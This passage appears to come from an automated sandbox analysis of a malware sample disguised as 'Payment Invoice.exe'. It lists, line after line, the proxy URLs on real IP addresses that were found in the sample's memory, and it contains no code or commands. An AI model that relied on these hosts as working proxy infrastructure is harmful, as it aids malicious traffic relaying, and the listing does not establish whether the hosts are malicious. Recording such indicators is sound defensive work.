                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.107.145:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.107.145:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.116.114.11:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.116.114.11:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.223.255.109:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.223.255.109:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.229.254
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.229.254.129:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.229.254.129:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.58.185.9:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.58.185.9:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.139.2.212:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.139.2.212:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.179.193.146:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.179.193.146:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.106.146.212:6001
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.106.146.212:6001://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.118.1.112:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.118.1.112:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.127.163.26
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.127.163.26://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.127.163.26:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.187.77.5
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.187.77.5://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.187.77.5:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.45:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.76:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.76:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.214.23:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.214.23:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.214.79:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.214.79:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.115.87:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.115.87:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.61.143:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.61.143:8123
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.61.143:8123://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319AB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32:8123
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32:8123://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.118.36
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.118.36://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.118.36:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.177.38:3129H
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.177.73:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.177.73:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.177.85:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.177.85:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316823000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.180.149:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316823000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.180.149:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.182.59:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.182.59:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.183.188:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.183.188:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.235.172:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.235.172:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.24.43.214:8123
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.24.43.214:8123://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.33.5
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.33.5.27:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.33.5.27:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.37.207.8:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.37.207.8:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.188.17:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.188.17:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.189.184:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.189.184:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.78.102.191
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.78.102.191://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.78.102.191:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.80.103.193:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.80.103.193:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.0.247.243:10834
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.0.247.243:10834://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.106.184.97:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.106.184.97:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.190.38:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.190.38:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.197.2:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.197.2:8080://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.111.182.6:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.111.182.6:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.114.84.190:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.114.84.190:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B0F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.115.157.211:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.115.157.211:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.174.198.95:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.174.198.95:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.24.130.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.24.130.138:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.24.130.138:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.25.254.193:54240
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.25.254.193:54240://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.39.139.65:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.52.148.10:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.52.148.10:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.54.194.13:53281
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.54.194.13:53281://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163179F7000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.55.249.135:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163179FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.55.249.135:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.7.11.15
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.7.11.154:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.7.11.154:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631837A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.70.34.22:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.70.34.22:41538
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317B5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.70.34.22:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631696D000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.81.127.113:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.81.127.113:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.95.184.58:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.95.184.58:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.95.184.62:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.95.184.62:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.97.76.186:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.97.76.186:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.144.20.231:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.144.20.231:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.170.180.188:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.170.180.188:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.67.70:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.67.70:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.94.9
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.94.93:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.94.93:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.218.144.19:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.218.144.19:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.219.201.14:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.219.201.14:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.220.112.98:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.220.112.98:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.221.134
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.221.134.74:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.221.134.74:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.243.82.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.243.82.157:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.243.82.157:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.2.115:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.2.115:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.2.177:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.2.177:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.2.185:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.2.185:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631823E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631822D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.2.249:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631823E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.2.249:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.42:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.42:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318216000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.52:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.52:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.60:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.60:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.61:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.61:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631970B000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.62:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.62:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.108.130:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.108.130:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319ADB000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.108.196:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.108.196:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.108.64:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.108.64:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.110.1:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.110.1:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.12.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.12.80.8:82
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.12.80.8:82://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.124.46.102:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319BB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.124.46.102:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.124.46.65:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.124.46.65:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.124.46.97:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.124.46.97:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.142.167.210:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.142.167.210:1080://proxy
